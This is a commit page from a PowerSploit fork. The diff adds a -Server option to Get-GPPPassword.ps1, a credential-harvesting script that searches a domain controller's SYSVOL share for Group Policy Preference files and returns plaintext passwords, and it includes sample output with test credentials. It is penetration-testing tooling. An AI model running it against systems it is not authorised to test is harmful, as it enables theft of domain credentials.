Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Added ability to specify domain controller to search (-Server parameter) 

Added the ability for users to specify the domain controller that is searched, using the -Server parameter. The -Server parameter is optional and defaults to the user's current domain if not specified.
This commit is contained in:
Dennis Maldonado 2016-06-30 08:46:08 -05:00 committed by GitHub
parent 262a260865
commit 548b8864cf
1 changed files with 37 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
Exfiltration/Get-GPPPassword.ps1
View File

@ -12,7 +12,12 @@ function Get-GPPPassword {
.DESCRIPTION .DESCRIPTION
Get-GPPPassword searches the domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords. Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
.PARAMETER Server
Specify the domain controller to search for.
Default's to the users current domain
.EXAMPLE .EXAMPLE
@ -42,6 +47,21 @@ function Get-GPPPassword {
UserNames : {DEMO\Administrator, admin} UserNames : {DEMO\Administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
.EXAMPLE
PS C:\> Get-GPPPassword -Server EXAMPLE.COM
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml
.EXAMPLE .EXAMPLE
PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
@ -63,7 +83,10 @@ function Get-GPPPassword {
#> #>
[CmdletBinding()] [CmdletBinding()]
Param () Param (
[String]
$Server
)
#Some XML issues between versions #Some XML issues between versions
Set-StrictMode -Version 2 Set-StrictMode -Version 2
@ -205,9 +228,18 @@ function Get-GPPPassword {
throw 'Machine is not a domain member or User is not a member of the domain.' throw 'Machine is not a domain member or User is not a member of the domain.'
} }
#Allow users to specify domain controller
if ($Server) {
$DomainController = $Server
}
else {
$DomainController = $Env:USERDNSDOMAIN
}
#discover potential files containing passwords ; not complaining in case of denied access to a directory #discover potential files containing passwords ; not complaining in case of denied access to a directory
Write-Verbose 'Searching the DC. This could take a while.' Write-Verbose "Searching \\$DomainController\SYSVOL. This could take a while."
$XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' $XMlFiles = Get-ChildItem -Path "\\$DomainController\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'
if ( -not $XMlFiles ) {throw 'No preference files found.'} if ( -not $XMlFiles ) {throw 'No preference files found.'}